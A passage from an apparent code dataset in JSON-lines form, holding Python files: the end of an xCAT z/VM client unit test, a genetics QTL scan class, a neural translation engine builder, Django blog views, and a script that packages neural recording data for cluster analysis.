0000\\n'\n 'zhcp2: controller_name: (NONE)\\n'\n 'zhcp2: port_name: (NONE)\\n'\n 'zhcp2: device_status: 0\\n'\n 'zhcp2: device_error_status 3\\n'\n 'zhcp2: real_device_address: 0022\\n'\n 'zhcp2: virtual_device_address: 0000\\n'\n 'zhcp2: controller_name: (NONE)\\n'\n 'zhcp2: port_name: (NONE)\\n'\n 'zhcp2: device_status: 0\\n'\n 'zhcp2: device_error_status 5\\n'\n 'zhcp2: real_device_address: 0033\\n'\n 'zhcp2: virtual_device_address: 0000\\n'\n 'zhcp2: controller_name: (NONE)\\n'\n 'zhcp2: port_name: (NONE)\\n'\n 'zhcp2: device_status: 0\\n'\n 'zhcp2: device_error_status 11\\n'\n 'zhcp2: Error controller_name is NULL!!\\n'\n 'zhcp2: port_num: 0000\\n'\n 'zhcp2: grant_userid: TEST1\\n'\n 'zhcp2: promiscuous_mode: NOPROM\\n'\n 'zhcp2: osd_sim: NOOSDSIM\\n'\n 'zhcp2: vlan_count: 1\\n'\n 'zhcp2: user_vlan_id: 0001\\n'\n 'zhcp2: port_num: 0000\\n'\n 'zhcp2: grant_userid: TEST2\\n'\n 'zhcp2: promiscuous_mode: NOPROM\\n'\n 'zhcp2: osd_sim: NOOSDSIM\\n'\n 'zhcp2: vlan_count: 1\\n'\n 'zhcp2: user_vlan_id: 0001\\n'\n 'zhcp2: port_num: 0000\\n'\n 'zhcp2: grant_userid: TEST3\\n'\n 'zhcp2: promiscuous_mode: NOPROM\\n'\n 'zhcp2: osd_sim: NOOSDSIM\\n'\n 'zhcp2: vlan_count: 3\\n'\n 'zhcp2: user_vlan_id: 0001\\n'\n 'zhcp2: user_vlan_id: 0002\\n'\n 'zhcp2: user_vlan_id: 0003\\n'\n 'zhcp2: adapter_owner: USERID1\\n'\n 'zhcp2: adapter_vdev: 0800\\n'\n 'zhcp2: adapter_macaddr: 02-00-02-00-00-D3\\n'\n 'zhcp2: adapter_type: QDIO\\n'\n 'zhcp2: adapter_owner: USERID2\\n'\n 'zhcp2: adapter_vdev: 0700\\n'\n 'zhcp2: adapter_macaddr: 02-00-02-00-00-70\\n'\n 'zhcp2: adapter_type: QDIO']],\n 'error': []}\n vsw = self._xcatclient.query_vswitch('UNITTEST')\n self.assertEqual(vsw['switch_name'], 'UNITTEST')\n self.assertEqual(vsw['transport_type'], 'IP')\n self.assertEqual(vsw['port_type'], 'ACCESS')\n self.assertEqual(vsw['queue_memory_limit'], '8')\n self.assertEqual(vsw['vlan_awareness'], 'AWARE')\n self.assertEqual(vsw['vlan_id'], '0011')\n self.assertEqual(vsw['native_vlan_id'], '0001')\n self.assertEqual(vsw['gvrp_request_attribute'], 'NOGVRP')\n self.assertEqual(vsw['user_port_based'], 'USERBASED')\n self.assertListEqual(sorted(['TEST1', 'TEST2', 'TEST3']),\n sorted(vsw['authorized_users'].keys()))\n self.assertEqual(vsw['authorized_users']['TEST3']['vlan_count'], '3')\n self.assertListEqual(\n sorted(vsw['authorized_users']['TEST3']['vlan_ids']),\n sorted(['0001', '0002', '0003']))\n self.assertListEqual(sorted(['USERID1_0800', 'USERID2_0700']),\n sorted(vsw['adapters'].keys()))\n self.assertEqual(vsw['adapters']['USERID1_0800']['mac'],\n '02-00-02-00-00-D3')\n self.assertEqual(vsw['adapters']['USERID1_0800']['type'],\n 'QDIO')\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, '_delete_nic_from_switch')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_nic(self, xrequest, delete_nic, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'cmabvt'}\n xrequest.return_value = {\"errorcode\": [['0']]}\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = ' '.join((\n '/opt/zhcp/bin/smcli '\n 'Virtual_Network_Adapter_Delete_DM -T fake_id',\n '-v fake_vdev'))\n xdsh_commands = 'command=%s' % commands\n body1 = [xdsh_commands]\n\n commands = ' '.join((\n '/opt/zhcp/bin/smcli '\n 'Virtual_Network_Adapter_Delete -T fake_id',\n '-v fake_vdev'))\n xdsh_commands = 'command=%s' % commands\n body2 = [xdsh_commands]\n\n self._xcatclient.delete_nic(\"fake_id\", \"fake_vdev\", True)\n xrequest.assert_any_call(\"PUT\", url, body1)\n xrequest.assert_any_call(\"PUT\", url, body2)\n delete_nic.assert_called_with(\"fake_id\", \"fake_vdev\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_nic_from_switch(self, xrequest):\n commands = \"-d node=fake_id,interface=fake_vdev switch\"\n url = self._xcat_url.tabch(\"/switch\")\n body = [commands]\n self._xcatclient._delete_nic_from_switch(\"fake_id\", \"fake_vdev\")\n xrequest.assert_called_with(\"PUT\", url, body)\n\n @mock.patch.object(xcatclient.XCATClient, 'xdsh')\n def test_image_get_root_disk_size(self, execute_cmd):\n fake_name = 'rhel7.2-s390x-netboot-fake_image_uuid'\n hexdumps = [\n '00000000 78 43 41 54 20 43 4b 44 20 44 69 73 6b 20 49 6d '\n '|xCAT CKD Disk Im|\\n',\n '00000010 61 67 65 3a 20 20 20 20 20 20 20 20 33 33 33 38 '\n '|age: 3338|\\n',\n '00000020 20 43 59 4c 20 48 4c 65 6e 3a 20 30 30 35 35 20 '\n '| CYL HLen: 0055 |\\n',\n '00000030 47 5a 49 50 3a 20 36 20 20 20 20 20 20 20 20 20 '\n '|GZIP: 6 |\\n',\n '00000040',\n ]\n prefix = CONF.xcat.master_node + ': '\n output = prefix + prefix.join(hexdumps)\n execute_cmd.return_value = {'data': [[output]]}\n ret = self._xcatclient.image_get_root_disk_size(fake_name)\n self.assertEqual(ret, '3338')\n","sub_path":"zvmsdk/tests/unit/test_xcatclient.py","file_name":"test_xcatclient.py","file_ext":"py","file_size_in_byte":80829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"174959425","text":"from __future__ import absolute_import, unicode_literals\n\nimport logging\nfrom operator import attrgetter\n\nfrom numpy import asarray, empty, nan\n\nfrom cachetools import LRUCache, cachedmethod\nfrom limix_inference.glmm import ExpFamEP\nfrom limix_inference.lmm import FastLMM\n\n\nclass QTLScan(object):\n def __init__(self, phenotype, covariates, X, Q0, Q1, S0):\n self._logger = logging.getLogger(__name__)\n\n self._cache_compute_null_model = LRUCache(maxsize=1)\n self._cache_compute_alt_models = LRUCache(maxsize=1)\n self._phenotype = phenotype\n self._covariates = covariates\n self._X = X\n self._Q0 = Q0\n self._Q1 = Q1\n self._S0 = S0\n self._null_lml = nan\n self._alt_lmls = None\n self._effect_sizes = None\n self.progress = True\n\n @property\n def candidate_markers(self):\n \"\"\"Candidate markers.\n\n :getter: Returns candidate markers\n :setter: Sets candidate markers\n :type: `array_like` (:math:`N\\\\times P_c`)\n \"\"\"\n return self._X\n\n @candidate_markers.setter\n def candidate_markers(self, X):\n self._X = X\n self._cache_compute_alt_models.clear()\n\n def compute_statistics(self):\n self._logger.info('Computing likelihood-ratio test statistics.')\n self._compute_null_model()\n self._compute_alt_models()\n\n @cachedmethod(attrgetter('_cache_compute_null_model'))\n def _compute_null_model(self):\n covariates = self._covariates\n Q0, Q1 = self._Q0, self._Q1\n S0 = self._S0\n if self._phenotype.likelihood_name.lower() == 'normal':\n flmm = FastLMM(\n self._phenotype.outcome,\n Q0=Q0,\n Q1=Q1,\n S0=S0,\n covariates=covariates)\n flmm.learn()\n self._flmm = flmm\n self._null_lml = flmm.lml()\n else:\n ep = ExpFamEP(\n self._phenotype.to_likelihood(),\n covariates,\n Q0=Q0,\n Q1=Q1,\n S0=S0)\n ep.optimize()\n self._null_lml = ep.lml()\n self._fixed_ep = ep.fixed_ep()\n\n @cachedmethod(attrgetter('_cache_compute_alt_models'))\n def _compute_alt_models(self):\n if self._phenotype.likelihood_name.lower() == 'normal':\n n, p = self._X.shape\n nc = self._covariates.shape[1]\n self._alt_lmls = empty(p)\n self._effect_sizes = empty(p)\n M = empty((n, nc + 1))\n M[:, :nc] = self._covariates\n for i in range(p):\n M[:, nc] = self._X[:, i]\n flmm = self._flmm.copy()\n flmm.M = M\n flmm.learn()\n self._alt_lmls[i] = flmm.lml()\n self._effect_sizes[i] = flmm.beta[-1]\n else:\n fep = self._fixed_ep\n covariates = self._covariates\n X = self._X\n self._alt_lmls, self._effect_sizes = fep.compute(covariates, X)\n\n def null_lml(self):\n \"\"\"Log marginal likelihood for the null hypothesis.\"\"\"\n self.compute_statistics()\n return self._null_lml\n\n def alt_lmls(self):\n \"\"\"Log marginal likelihoods for the alternative hypothesis.\"\"\"\n self.compute_statistics()\n return self._alt_lmls\n\n def candidate_effect_sizes(self):\n \"\"\"Effect size for candidate markers.\"\"\"\n self.compute_statistics()\n return self._effect_sizes\n\n def pvalues(self):\n \"\"\"Association p-value for candidate markers.\"\"\"\n self.compute_statistics()\n\n lml_alts = self.alt_lmls()\n lml_null = self.null_lml()\n\n lrs = -2 * lml_null + 2 * asarray(lml_alts)\n\n from scipy.stats import chi2\n chi2 = chi2(df=1)\n\n return chi2.sf(lrs)\n","sub_path":"lim/genetics/qtl/_qtl.py","file_name":"_qtl.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"396148006","text":"import glob\nimport logging\nimport os\nimport shutil\nimport sys\nimport time\n\nfrom cli import mmt_javamain, LIB_DIR, PYOPT_DIR\nfrom cli.libs import fileutils\nfrom cli.libs import shell\nfrom cli.mmt import BilingualCorpus\nfrom cli.mmt.engine import Engine, EngineBuilder\nfrom cli.mmt.processing import TrainingPreprocessor\n\nsys.path.insert(0, os.path.abspath(os.path.join(LIB_DIR, 'pynmt')))\n\nimport onmt\nimport nmmt\nfrom nmmt import NMTEngineTrainer, NMTEngine, SubwordTextProcessor, MMapDataset, Suggestion\nfrom nmmt import torch_setup\nfrom nmmt import torch_utils\nimport torch\n\n\ndef _log_timed_action(logger, op, level=logging.INFO, log_start=True):\n class _logger:\n def __init__(self):\n self.logger = logger\n self.level = level\n self.op = op\n self.start_time = None\n self.log_start = log_start\n\n def __enter__(self):\n self.start_time = time.time()\n if self.log_start:\n self.logger.log(self.level, '%s... START' % self.op)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.logger.log(self.level, '%s END %.2fs' % (self.op, time.time() - self.start_time))\n\n return _logger()\n\n\nclass TranslationMemory:\n def __init__(self, model, source_lang, target_lang):\n self._model = model\n self._source_lang = source_lang\n self._target_lang = target_lang\n\n self._java_mainclass = 'eu.modernmt.cli.TranslationMemoryMain'\n\n def create(self, corpora, log=None):\n if log is None:\n log = shell.DEVNULL\n\n source_paths = set()\n\n for corpus in corpora:\n source_paths.add(corpus.get_folder())\n\n shutil.rmtree(self._model, ignore_errors=True)\n fileutils.makedirs(self._model, exist_ok=True)\n\n args = ['-s', self._source_lang, '-t', self._target_lang, '-m', self._model, '-c']\n for source_path in source_paths:\n args.append(source_path)\n\n command = mmt_javamain(self._java_mainclass, args)\n shell.execute(command, stdout=log, stderr=log)\n\n\nclass NMTPreprocessor:\n def __init__(self, source_lang, target_lang, bpe_symbols, max_vocab_size, vocab_pruning_threshold):\n self._source_lang = source_lang\n self._target_lang = target_lang\n self._bpe_symbols = bpe_symbols\n self._max_vocab_size = max_vocab_size\n self._vocab_pruning_threshold = vocab_pruning_threshold\n\n self._logger = logging.getLogger('mmt.neural.NMTPreprocessor')\n self._ram_limit_mb = 1024\n\n def process(self, corpora, valid_corpora, output_path, checkpoint=None):\n bpe_output_path = os.path.join(output_path, 'vocab.bpe')\n voc_output_path = os.path.join(output_path, 'vocab.pt')\n\n if checkpoint is not None:\n existing_bpe_path = checkpoint + '.bpe'\n existing_dat_path = checkpoint + '.dat'\n existing_vcb_path = checkpoint + '.vcb'\n\n with _log_timed_action(self._logger, 'Loading BPE model from %s' % existing_bpe_path):\n shutil.copy(existing_bpe_path, bpe_output_path)\n bpe_encoder = SubwordTextProcessor.load_from_file(bpe_output_path)\n\n with _log_timed_action(self._logger, 'Loading vocabularies from %s' % existing_dat_path):\n checkpoint_vcb = torch.load(existing_vcb_path, map_location=lambda storage, loc: storage)\n src_vocab = checkpoint_vcb['src']\n trg_vocab = checkpoint_vcb['tgt']\n\n else:\n with _log_timed_action(self._logger, 'Creating BPE model'):\n vb_builder = SubwordTextProcessor.Builder(symbols=self._bpe_symbols,\n max_vocabulary_size=self._max_vocab_size,\n vocab_pruning_threshold=self._vocab_pruning_threshold)\n bpe_encoder = vb_builder.build([c.reader([self._source_lang, self._target_lang]) for c in corpora])\n bpe_encoder.save_to_file(bpe_output_path)\n\n with _log_timed_action(self._logger, 'Creating vocabularies'):\n src_vocab = onmt.Dict([onmt.Constants.PAD_WORD, onmt.Constants.UNK_WORD,\n onmt.Constants.BOS_WORD, onmt.Constants.EOS_WORD], lower=False)\n trg_vocab = onmt.Dict([onmt.Constants.PAD_WORD, onmt.Constants.UNK_WORD,\n onmt.Constants.BOS_WORD, onmt.Constants.EOS_WORD], lower=False)\n\n for word in bpe_encoder.get_source_terms():\n src_vocab.add(word)\n for word in bpe_encoder.get_target_terms():\n trg_vocab.add(word)\n\n torch.save({\n 'src': src_vocab,\n 'tgt': trg_vocab\n }, voc_output_path)\n\n with _log_timed_action(self._logger, 'Preparing training corpora'):\n train_output_path = os.path.join(output_path, 'train_dataset')\n self._prepare_corpora(corpora, bpe_encoder, src_vocab, trg_vocab, train_output_path)\n\n with _log_timed_action(self._logger, 'Preparing validation corpora'):\n valid_output_path = os.path.join(output_path, 'valid_dataset')\n self._prepare_corpora(valid_corpora, bpe_encoder, src_vocab, trg_vocab, valid_output_path)\n\n def _prepare_corpora(self, corpora, bpe_encoder, src_vocab, trg_vocab, output_path):\n count, added, ignored = 0, 0, 0\n\n builder = MMapDataset.Builder(output_path)\n\n for corpus in corpora:\n with corpus.reader([self._source_lang, self._target_lang]) as reader:\n for source, target in reader:\n src_words = bpe_encoder.encode_line(source, is_source=True)\n trg_words = bpe_encoder.encode_line(target, is_source=False)\n\n if len(src_words) > 0 and len(trg_words) > 0:\n source = src_vocab.convertToIdxList(src_words,\n onmt.Constants.UNK_WORD)\n target = trg_vocab.convertToIdxList(trg_words,\n onmt.Constants.UNK_WORD,\n onmt.Constants.BOS_WORD,\n onmt.Constants.EOS_WORD)\n builder.add([source], [target])\n added += 1\n\n else:\n ignored += 1\n\n count += 1\n if count % 100000 == 0:\n self._logger.info(' %d sentences prepared' % count)\n\n self._logger.info('Prepared %d sentences (%d ignored due to length == 0)' % (added, ignored))\n\n return builder.build(self._ram_limit_mb)\n\n\nclass NMTDecoder:\n def __init__(self, model, source_lang, target_lang):\n self._logger = logging.getLogger('mmt.neural.NMTDecoder')\n\n self.model = model\n self._source_lang = source_lang\n self._target_lang = target_lang\n\n def train(self, train_path, working_dir, training_opts, checkpoint_path=None, metadata_path=None):\n self._logger.info('Training started for data \"%s\"' % train_path)\n\n state = None\n state_file = os.path.join(working_dir, 'state.json')\n\n if os.path.isfile(state_file):\n state = NMTEngineTrainer.State.load_from_file(state_file)\n\n # Loading training data ----------------------------------------------------------------------------------------\n with _log_timed_action(self._logger, 'Loading training data from \"%s\"' % train_path):\n train_dataset_path = os.path.join(train_path, 'train_dataset')\n valid_dataset_path = os.path.join(train_path, 'valid_dataset')\n vocab_path = os.path.join(train_path, 'vocab.pt')\n\n train_dataset = MMapDataset.load(train_dataset_path)\n valid_dataset = MMapDataset.load(valid_dataset_path)\n vocab = torch.load(vocab_path)\n src_dict, tgt_dict = vocab['src'], vocab['tgt']\n\n # Creating trainer ---------------------------------------------------------------------------------------------\n if state is not None and state.checkpoint is not None:\n with _log_timed_action(self._logger, 'Resuming engine from step %d' % state.checkpoint['step']):\n engine = NMTEngine.load_from_checkpoint(state.checkpoint['file'])\n else:\n if checkpoint_path is not None:\n with _log_timed_action(self._logger, 'Loading engine from %s' % checkpoint_path):\n engine = NMTEngine.load_from_checkpoint(checkpoint_path)\n else:\n metadata = None\n if metadata_path is not None:\n metadata = NMTEngine.Metadata()\n metadata.load_from_file(metadata_path)\n self._logger.info('Neural engine metadata read from %s' % metadata_path)\n\n with _log_timed_action(self._logger, 'Reading BPE processor'):\n bpe_model_path = os.path.join(train_path, 'vocab.bpe')\n bpe_encoder = SubwordTextProcessor.load_from_file(bpe_model_path)\n\n with _log_timed_action(self._logger, 'Creating engine from scratch'):\n engine = NMTEngine.new_instance(src_dict, tgt_dict, bpe_encoder, metadata=metadata)\n\n engine.running_state = NMTEngine.HOT\n\n trainer = NMTEngineTrainer(engine, state=state, options=training_opts)\n\n # Training model -----------------------------------------------------------------------------------------------\n self._logger.info('Vocabulary size. source = %d; target = %d' % (src_dict.size(), tgt_dict.size()))\n self._logger.info('Engine parameters: %d' % engine.count_parameters())\n self._logger.info('Engine metadata: %s' % str(engine.metadata))\n self._logger.info('Trainer options: %s' % str(trainer.opts))\n\n with _log_timed_action(self._logger, 'Train model'):\n state = trainer.train_model(train_dataset, valid_dataset=valid_dataset, save_path=working_dir)\n\n if state.empty():\n raise Exception('Training interrupted before first checkpoint could be saved')\n\n def merge_checkpoints(self, checkpoints_folder, limit=None):\n state = NMTEngineTrainer.State.load_from_file(os.path.join(checkpoints_folder, 'state.json'))\n\n # Create destination folder\n model_folder = os.path.abspath(os.path.join(self.model, os.path.pardir))\n if not os.path.isdir(model_folder):\n os.mkdir(model_folder)\n\n # Copy checkpoints files excluding .dat\n for f in glob.glob(state.checkpoint['file'] + '.*'):\n _, extension = os.path.splitext(f)\n\n if extension != '.dat':\n shutil.copy(f, self.model + extension)\n\n # Merging checkpoints\n checkpoints = [c['file'] + '.dat' for c in state.history]\n if limit is not None and len(checkpoints) > limit:\n checkpoints = checkpoints[:limit]\n\n with _log_timed_action(self._logger, 'Merge checkpoints %r to %s' % (checkpoints, model_folder)):\n NMTEngineTrainer.merge_checkpoints(checkpoints, self.model + '.dat')\n\n with open(os.path.join(model_folder, 'model.conf'), 'w') as model_map:\n filename = os.path.basename(self.model)\n model_map.write('[models]\\n')\n model_map.write('%s__%s = %s\\n' % (self._source_lang, self._target_lang, filename))\n\n\nclass NeuralEngine(Engine):\n def __init__(self, name, source_lang, target_lang, bpe_symbols, max_vocab_size=None, vocab_pruning_threshold=None):\n Engine.__init__(self, name, source_lang, target_lang)\n\n self._bleu_script = os.path.join(PYOPT_DIR, 'mmt-bleu.perl')\n\n decoder_path = os.path.join(self.models_path, 'decoder')\n\n # Neural specific models\n model_name = 'model.%s__%s' % (source_lang, target_lang)\n\n memory_path = os.path.join(decoder_path, 'memory')\n decoder_model = os.path.join(decoder_path, model_name)\n\n self.memory = TranslationMemory(memory_path, self.source_lang, self.target_lang)\n self.nmt_preprocessor = NMTPreprocessor(self.source_lang, self.target_lang,\n bpe_symbols=bpe_symbols, max_vocab_size=max_vocab_size,\n vocab_pruning_threshold=vocab_pruning_threshold)\n self.decoder = NMTDecoder(decoder_model, self.source_lang, self.target_lang)\n\n def type(self):\n return 'neural'\n\n\nclass NeuralEngineBuilder(EngineBuilder):\n def __init__(self, name, source_lang, target_lang, roots, debug=False, steps=None, split_trainingset=True,\n validation_corpora=None, checkpoint=None, metadata=None, max_training_words=None, gpus=None,\n training_args=None):\n torch_setup(gpus=gpus, random_seed=3435)\n\n self._training_opts = NMTEngineTrainer.Options()\n if training_args is not None:\n self._training_opts.load_from_dict(training_args.__dict__)\n\n engine = NeuralEngine(name, source_lang, target_lang, bpe_symbols=self._training_opts.bpe_symbols,\n max_vocab_size=self._training_opts.max_vocab_size,\n vocab_pruning_threshold=self._training_opts.vocab_pruning_threshold)\n EngineBuilder.__init__(self, engine, roots, debug, steps, split_trainingset, max_training_words)\n\n self._valid_corpora_path = validation_corpora if validation_corpora is not None \\\n else os.path.join(self._engine.data_path, TrainingPreprocessor.DEV_FOLDER_NAME)\n self._checkpoint = checkpoint\n self._metadata = metadata\n\n def _build_schedule(self):\n return EngineBuilder._build_schedule(self) + \\\n [self._build_memory, self._prepare_training_data, self._train_decoder, self._merge_checkpoints]\n\n def _check_constraints(self):\n recommended_gpu_ram = 2 * self._GB\n\n # Get the list of GPUs to employ using torch utils (This takes into account the user's choice)\n gpus = torch_utils.torch_get_gpus()\n\n if gpus is None or len(gpus) == 0:\n raise EngineBuilder.HWConstraintViolated(\n 'No GPU for Neural engine training, the process will take very long time to complete.')\n\n # AT THE MOMENT TRAINING IS MONOGPU AND WE ONLY USE THE FIRST AVAILABLE GPU FOR TRAINING.\n # SO JUST CHECK CONSTRAINTS FOR IT. THIS MAY CHANGE IN THE FUTURE\n gpus = [gpus[0]]\n\n gpus_ram = self._get_gpus_ram(gpus)\n\n for i in range(len(gpus_ram)):\n if gpus_ram[i] < recommended_gpu_ram:\n raise EngineBuilder.HWConstraintViolated(\n 'The RAM of GPU %d is only %.fG. More than %.fG of RAM recommended for each GPU.' %\n (gpus[i], gpus_ram[i] / self._GB, recommended_gpu_ram / self._GB)\n )\n\n def _get_gpus_ram(self, gpu_ids):\n result = []\n command = [\"nvidia-smi\", \"--query-gpu=memory.total\", \"--format=csv,noheader,nounits\",\n \"--id=%s\" % \",\".join(str(i) for i in gpu_ids)]\n stdout, _ = shell.execute(command)\n for line in stdout.split(\"\\n\"):\n line = line.strip()\n if line:\n result.append(int(line) * self._MB)\n return result\n\n # ~~~~~~~~~~~~~~~~~~~~~ Training step functions ~~~~~~~~~~~~~~~~~~~~~\n\n @EngineBuilder.Step('Creating translation memory')\n def _build_memory(self, args, skip=False, log=None):\n if not skip:\n corpora = filter(None, [args.processed_bilingual_corpora, args.bilingual_corpora])[0]\n self._engine.memory.create(corpora, log=log)\n\n @EngineBuilder.Step('Preparing training data')\n def _prepare_training_data(self, args, skip=False, delete_on_exit=False):\n args.onmt_training_path = self._get_tempdir('onmt_training')\n\n if not skip:\n processed_valid_path = os.path.join(args.onmt_training_path, 'processed_valid')\n\n validation_corpora = BilingualCorpus.list(self._valid_corpora_path)\n validation_corpora, _ = self._engine.training_preprocessor.process(validation_corpora, processed_valid_path)\n\n corpora = filter(None, [args.processed_bilingual_corpora, args.bilingual_corpora])[0]\n\n self._engine.nmt_preprocessor.process(corpora, validation_corpora, args.onmt_training_path,\n checkpoint=self._checkpoint)\n\n if delete_on_exit:\n shutil.rmtree(processed_valid_path, ignore_errors=True)\n\n @EngineBuilder.Step('Neural decoder training')\n def _train_decoder(self, args, skip=False):\n working_dir = self._get_tempdir('onmt_model')\n\n if not skip:\n self._engine.decoder.train(args.onmt_training_path, working_dir, self._training_opts,\n checkpoint_path=self._checkpoint, metadata_path=self._metadata)\n\n @EngineBuilder.Step('Saving neural model', optional=False)\n def _merge_checkpoints(self, _, skip=False):\n working_dir = self._get_tempdir('onmt_model')\n\n if not skip:\n self._engine.decoder.merge_checkpoints(working_dir, limit=self._training_opts.n_avg_checkpoints)\n","sub_path":"cli/mmt/neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":17443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"50483383","text":"from django.shortcuts import render_to_response, get_object_or_404\nfrom blog.models import Post, Review\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\n\nblog = {'url': settings.URL,\n 'title': settings.TITLE,\n 'description': settings.DESCRIPTION }\n\n# Remember we assume that there's only one user in our system\nuser = User.objects.get(id=1)\nauthor = {'first_name': user.first_name,\n 'last_name': user.last_name}\n\ndef index(request):\n entries = Post.objects.all()\n return render_to_response('index.html', {'blog': blog,\n 'author': author,\n 'entries': entries})\n\ndef entry(request, slug):\n entry = get_object_or_404(Post, slug = slug)\n return render_to_response('entry.html', {'title': settings.TITLE,\n 'entry': entry})\n\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"68178256","text":"import os\nimport sys\nimport platform\n\nimport pandas as pd\nimport numpy as np\n\nop = os.path\n\n\nif platform.uname().node=='US-N098515':\n rec_file = r'C:\\Users\\bsriram\\Desktop\\Data\\PGRN_Coh3\\Record_Log_PGRN2.xls'\n base_path = r'C:\\Users\\bsriram\\Desktop\\Data\\PGRN_Coh3'\n save_path = r'C:\\Users\\bsriram\\Desktop\\Data\\Results'\nelif 'camhpc' in platform.uname().node:\n base_path = '/home/bsriram/PGRN_Coh3'\n rec_file = '/home/bsriram/Record_Log_PGRN2.xls'\n save_path = '/home/bsriram/Results/'\n \n\ndef pack(save_loc,data,sr,n_chans=None,filename='raw.dat',ratio=None):\n \"\"\"\n given a raw_data file(np.int16) and other data as provided, this function \n will pack the data into the save_loc folder. \n \"\"\"\n print('saving raw data to {0}'.format(save_loc))\n assert op.exists(save_loc),'Need for the save_loc folder [{0}] to exist'.format(save_loc)\n data.tofile(op.join(save_loc,filename))\n if ratio: ratio.tofile(op.join(save_loc,'voltage_scale.np'))\n if n_chans: n_chans.tofile(op.join(save_loc,'n_chans.np'))\n sr.tofile(op.join(save_loc,'sample_rate.np'))\n print('raw data packed')\n print('')\n\ndef pack_running(save_loc,running):\n \"\"\"\n given a raw_data file(np.int16) and other data as provided, this function \n will pack the data into the save_loc folder. \n \"\"\"\n print(f\"saving running data to {save_loc}\")\n assert op.exists(save_loc),f\"Need for the save_loc folder [{save_loc}] to exist\"\n running.tofile(op.join(save_loc,'running.np'))\n print('running data packed')\n print('')\n\n\ndef make_qsub_for_data_packing(save_path,n_processes):\n \"\"\"\n makes a qsub script for running individual sessions on servers\n \"\"\"\n with open(op.join(save_path,'pack_recordings.qsub'),'w') as f:\n f.write(\"\"\"#!/bin/bash\n#$ -N package_data_for_analysis\n#$ -l h_rt=12:00:00 \n#$ -q long.q \n#$ -wd /home/bsriram/Results/\n#$ -j no \n#$ -M balaji.sriram@biogen.com\n#$ -m be \n#$ -e error.log \n#$ -o output.log \n#$ -pe openmpi-fillup 12\n#$ -t 1-{0}\n\n##########################################################################\n# Start your script here #\n##########################################################################\n# Load the modules you need.\nsource /home/bsriram/miniconda3/bin/activate nca_utils\n# Run some commands.\npython /home/bsriram/code/neuralcircuits_analysis/process_recording_files.py $SGE_TASK_ID\n\n# Exit successfully.\nexit 0\n\"\"\".format(n_processes))\n print('wrote into '+op.join(save_path,'pack_recordings.qsub'))\n\nif __name__=='__main__':\n # location of the excel sheet containing information\n xl_loc = r'/home/bsriram/Record_Log_PGRN2.xls'\n recs = pd.read_excel(xl_loc)\n print('Total_number_of_recording_files={0}'.format(len(recs)))\n \n # select only some files if a secondary detail is provided to the call to process_recording_files\n if len(sys.argv)==1:\n pass # if there is no further information then you'll need to process all\n else:\n recs = recs.iloc[[int(sys.argv[1])-1],:] # if there is another arg, then process only that record\n \n print('Total_number_of_recording_files={0}'.format(len(recs)))\n \n # need to determine if we are running in posix or nt - will determine the analysis folder to use\n if platform.python_version()[:1]=='3':\n if platform.uname().node=='US-N098515':\n recs['analysis_data_path'] = recs.analysis_data_path_nt\n elif 'camhpc' in platform.uname().node:\n recs['analysis_data_path'] = recs.analysis_data_path_nix\n else:\n if platform.uname()[1]=='US-N098515':\n recs['analysis_data_path'] = recs.analysis_data_path_nt\n elif 'camhpc' in platform.uname()[1]:\n recs['analysis_data_path'] = recs.analysis_data_path_nix\n \n # ensure details exist in the dataset\n # details to check:\n # 0. session_exists\n # 1. n_r_stim\n # 2. n_l_stim\n # 3. has_whisk_cam\n # 3.5 has_whisk_chan\n # 4. has_eye_cam\n # 4.5 has_eye_chan\n # 5. has_running\n ensure_details_exist = False\n if ensure_details_exist:\n sess_exist = []\n sess_duration = []\n n_r_stim = []\n n_l_stim = []\n has_whisk_cam = []\n n_whisk_chan = []\n has_eye_cam = []\n n_eye_chan = []\n has_running = []\n \n for row in recs.itertuples():\n if row.data_source=='tdt':\n that_folder_exist = op.exists(op.join(row.raw_data_path,row.folder))\n sess_exist.append(that_folder_exist)\n if that_folder_exist:\n print ('Index::',row.Index)\n import tdt\n temp = tdt.read_block(op.join(op.join(row.raw_data_path,row.folder)))\n \n try:\n dur = temp.info.stop_date-temp.info.start_date\n sess_duration.append(dur.total_seconds())\n except TypeError as er:\n print(type(er))\n import datetime\n dur = datetime.datetime.strptime(temp.info.stop,'%H:%M:%S%p %m/%d/%Y')-datetime.datetime.strptime(temp.info.start,'%H:%M:%S%p %m/%d/%Y')\n sess_duration.append(dur.total_seconds())\n except Exception as er:\n raise(er)\n \n if 'TRGR' in temp.epocs.__dir__():\n n_r_stim.append(len(temp.epocs.TRGR.data))\n else:\n n_r_stim.append(0)\n \n if 'TRGL' in temp.epocs.__dir__():\n n_l_stim.append(len(temp.epocs.TRGL.data))\n else:\n n_l_stim.append(0)\n \n has_whisk_cam.append(len([f for f in os.listdir(row.raw_data_path) if 'WHISK' in f]))\n try:\n n_whisk_chan.append(len(temp.epocs.PtC0.data))\n except AttributeError as er:\n if 'no attribute' in repr(er): n_whisk_chan.append(np.nan)\n except Exception as er:\n raise(er)\n \n has_eye_cam.append(len([f for f in os.listdir(row.raw_data_path) if 'EYE' in f]))\n try:\n n_eye_chan.append(len(temp.epocs.PtC1.data))\n except AttributeError as er:\n if 'no attribute' in repr(er): n_eye_chan.append(np.nan)\n except Exception as er:\n raise(er)\n \n has_running.append('Run1' in temp.streams.__dir__())\n else:\n sess_duration.append(np.nan)\n n_r_stim.append(np.nan)\n n_l_stim.append(np.nan)\n has_whisk_cam.append(np.nan)\n n_whisk_chan.append(np.nan)\n has_eye_cam.append(np.nan)\n 